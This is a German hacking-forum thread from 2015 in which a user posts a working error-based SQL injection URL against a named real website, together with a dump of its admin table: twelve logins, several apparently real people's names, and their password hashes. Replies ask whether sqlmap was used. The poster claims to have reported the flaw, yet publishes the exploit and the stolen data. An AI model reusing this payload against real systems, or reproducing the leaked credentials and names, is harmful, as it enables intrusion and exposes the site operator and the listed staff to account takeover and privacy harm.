Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

SQLI - urano.de

- - - - -
Erstellt von x4r4x ,

  • Bitte melde dich an um zu Antworten
2 Antworten in diesem Thema

#1
x4r4x
Geschrieben 31 October 2015 - 04:21 Uhr

x4r4x

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
    • Likes
    47
  • 46 Beiträge
  • 15 Bedankt 
http://www.urano.de/index.php?inhalt=download&download=download&id=47

Query:

http://www.urano.de/index.php?inhalt=download' and (select 1 from(select count(*),concat(0x7e,(select mid((ifnull(cast(login as char),0x20)),1,54) from web01db1.pw_admin order by login limit 7,1),0x7e,floor(rand(0)*2))x from information_schema.character_sets group by x)a) and 'x'='x&download=download&id=47

wonjfTi.png

 

Dump:

Database: web01db1
Table: pw_admin
[12 entries]
+----+--------------------+----------------------------------+
| id | login              | pass                             |
+----+--------------------+----------------------------------+
| 1  | superadmin         | 4aa85af56a70bafbf2786cc83d254c7b |
| 14 | superuser          | 4aa85af56a70bafbf2786cc83d254c7b |
| 24 | carla              | 652e3c79486e49c7aee3b3b0fa3afeb7 |
| 31 | Thomas             | c5069e387fa20a0dfebbf09ef2b52977 |
| 33 | Sandy Kuntze       | 50f36a7f63cc2152437b9c6d87125984 |
| 35 | Denise Hoffmann    | b5dd7c2ddde8b01ffac3c2fd2645d3c8 |
| 39 | Catherine Jessat   | 77a60cfe9813864d603c68714cf6bbee |
| 40 | Hosting            | 2693245dae5e361522bd4763a23f854a |
| 42 | BettinaBeck        | 1b704c744a8e3765f372058d32fabfc1 |
| 44 | jessica saueressig | ca783e21fdfd3765f009797479ee5ed4 |
| 46 | Thomas Poth        | 3584f7932d98de052bb64b818c3ec8a0 |
| 48 | tobias.spindler    | 1dc6fd622da77843bdf1ac16449cf698 |
+----+--------------------+----------------------------------+

Soviel zu deren Werbung:

BOGYsxC.png

 

Ich habe diese Sicherheitslücke bereits dem Betreiber gemeldet und warte nun auf eine Antwort.


Bearbeitet von x4r4x, 31 October 2015 - 04:29 Uhr.

  • len0, lNobodyl und fAYe gefällt das

#2
lNobodyl
Geschrieben 31 October 2015 - 11:11 Uhr

lNobodyl

    Hacktivist

  • Premium Member
    • Likes
    55
  • 67 Beiträge
  • 22 Bedankt
  • iPhone
  • Windows, Mac OS

Guter Fund! Hast du die Lücke selbst gefunden oder hast du automatisierte Tools wie sqlmap benutzt?


Kind regards,

Nobody

nobody@xmpp.ninja

#3
x4r4x
Geschrieben 31 October 2015 - 11:16 Uhr

x4r4x

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
    • Likes
    47
  • 46 Beiträge
  • 15 Bedankt

Selbst gefunden, aber mit sqlmap exploited (war zu faul).


  • lNobodyl gefällt das
Zurück zu  Classic Hacking

  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 47 Mitglied(ern) gelesen


    , <cerrno>, Arthurarsch, B1nary, Backdoored, beon, Bot4ng, bumg2, Bypass, Ch!ller, chick0n, Crap, Cube, cyberbitch, Dicklessde, dvalar, eXact, Exynos, fAYe, ferithan, Framerater, frechdax, hacked, iggl, izibitzi, Jackson, Klopfer, len0, lNobodyl, mister-miyagi, most_uniQue, netSecMushroom, Phalanx, princearab, SepaX, Silent0wn3r, Slixer, sniffer, SYS64738, the.3nd, Toolbase, umarex, x4r4x, xenomorph, xFAUSTx, Z3LuX, ZeroFreez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking